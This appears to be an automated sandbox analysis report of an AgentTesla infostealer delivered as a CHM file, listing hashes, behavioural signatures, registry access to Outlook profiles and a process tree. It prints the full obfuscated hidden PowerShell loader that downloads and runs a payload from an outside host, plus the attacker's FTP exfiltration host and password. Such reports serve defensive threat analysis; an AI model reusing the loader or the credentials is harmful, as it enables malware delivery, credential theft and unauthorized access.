Analysis
- max time kernel: 51s
- max time network: 46s
- platform: windows7_x64
- resource: win7-20220414-en
- submitted: 20-05-2022 01:54
Static task: static1
Behavioral task: behavioral1
  Sample: 4e5ef8e38b17fdf30961f28d4b5e2e23.chm
  Resource: win7-20220414-en
Behavioral task: behavioral2
  Sample: 4e5ef8e38b17fdf30961f28d4b5e2e23.chm
  Resource: win10v2004-20220414-en
General
- Target: 4e5ef8e38b17fdf30961f28d4b5e2e23.chm
- Size: 14KB
- MD5: 4e5ef8e38b17fdf30961f28d4b5e2e23
- SHA1: a7da3f869505242eb93c6bb07bc7cc76b6a5d71b
- SHA256: f0c20d4ea2e2cc1d3c9df58b1a4854f9e3b761b7cd0c26860559289c74a8d50f
- SHA512: c33cfc30c355dcb2638a7835986572c3da27b12cbb6c4a3773fbd1ce03e2c5b1710e15f1a15253f2951455eae53e71b5837dcc4176ace40bf43326b72e846f7c
Malware Config
Extracted
- http://pacurariu.com/F37.jpg
Extracted
- Protocol: ftp
- Host: ftp.jordi-spedition.com
- Port: 21
- Username: [email protected]
- Password: asdqwe123!@#
Extracted
- agenttesla
- Protocol: ftp
- Host: ftp://ftp.jordi-spedition.com/
- Port: 21
- Username: [email protected]
- Password: asdqwe123!@#
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- suricata: ET MALWARE AgentTesla Exfil via FTP
  suricata: ET MALWARE AgentTesla Exfil via FTP
- Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  5     2024  powershell.exe
- Loads dropped DLL (2 IoCs)
  pid   Process
  2024  powershell.exe
  2024  powershell.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  description / ioc / Process
  Key opened: \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
  Key opened: \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
  Key opened: \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
- Suspicious use of SetThreadContext (1 IoC)
  description / pid / Process / procid_target
  PID 2024 set thread context of 1200 (pid 2024, powershell.exe, procid_target 32)
- Modifies Internet Explorer settings (1 IoC)
  description / ioc / Process
  Key created: \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Internet Explorer\Main (hh.exe)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  2024  powershell.exe
  1200  RegAsm.exe
  1200  RegAsm.exe
- Suspicious use of AdjustPrivilegeToken (22 IoCs)
  description / pid / Process
  Token: SeDebugPrivilege (2024, powershell.exe)
  Token: SeIncreaseQuotaPrivilege (2024, powershell.exe)
  Token: SeSecurityPrivilege (2024, powershell.exe)
  Token: SeTakeOwnershipPrivilege (2024, powershell.exe)
  Token: SeLoadDriverPrivilege (2024, powershell.exe)
  Token: SeSystemProfilePrivilege (2024, powershell.exe)
  Token: SeSystemtimePrivilege (2024, powershell.exe)
  Token: SeProfSingleProcessPrivilege (2024, powershell.exe)
  Token: SeIncBasePriorityPrivilege (2024, powershell.exe)
  Token: SeCreatePagefilePrivilege (2024, powershell.exe)
  Token: SeBackupPrivilege (2024, powershell.exe)
  Token: SeRestorePrivilege (2024, powershell.exe)
  Token: SeShutdownPrivilege (2024, powershell.exe)
  Token: SeDebugPrivilege (2024, powershell.exe)
  Token: SeSystemEnvironmentPrivilege (2024, powershell.exe)
  Token: SeRemoteShutdownPrivilege (2024, powershell.exe)
  Token: SeUndockPrivilege (2024, powershell.exe)
  Token: SeManageVolumePrivilege (2024, powershell.exe)
  Token: 33 (2024, powershell.exe)
  Token: 34 (2024, powershell.exe)
  Token: 35 (2024, powershell.exe)
  Token: SeDebugPrivilege (1200, RegAsm.exe)
- Suspicious use of SetWindowsHookEx (2 IoCs)
  pid   Process
  1160  hh.exe
  1160  hh.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  description / pid / Process / procid_target
  PID 1160 wrote to memory of 2024 (pid 1160, hh.exe, procid_target 29)
  PID 1160 wrote to memory of 2024 (pid 1160, hh.exe, procid_target 29)
  PID 1160 wrote to memory of 2024 (pid 1160, hh.exe, procid_target 29)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
  PID 2024 wrote to memory of 1200 (pid 2024, powershell.exe, procid_target 32)
- outlook_office_path (1 IoC)
  description / ioc / Process
  Key opened: \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
- outlook_win_path (1 IoC)
  description / ioc / Process
  Key opened: \REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 (RegAsm.exe)
Processes
1. C:\Windows\hh.exe (PID 1160)
   Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\4e5ef8e38b17fdf30961f28d4b5e2e23.chm
   - Modifies Internet Explorer settings
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2024, child of 1)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'http' + '://pacurariu.com/F37.jpg')|P
      - Blocklisted process makes network request
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe (PID 1200, child of 2)
         Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
         - Accesses Microsoft Outlook profiles
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - outlook_office_path
         - outlook_win_path
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81
- Filesize: 75KB
  MD5: 42b2c266e49a3acd346b91e3b0e638c0
  SHA1: 2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1
  SHA256: adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29
  SHA512: 770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81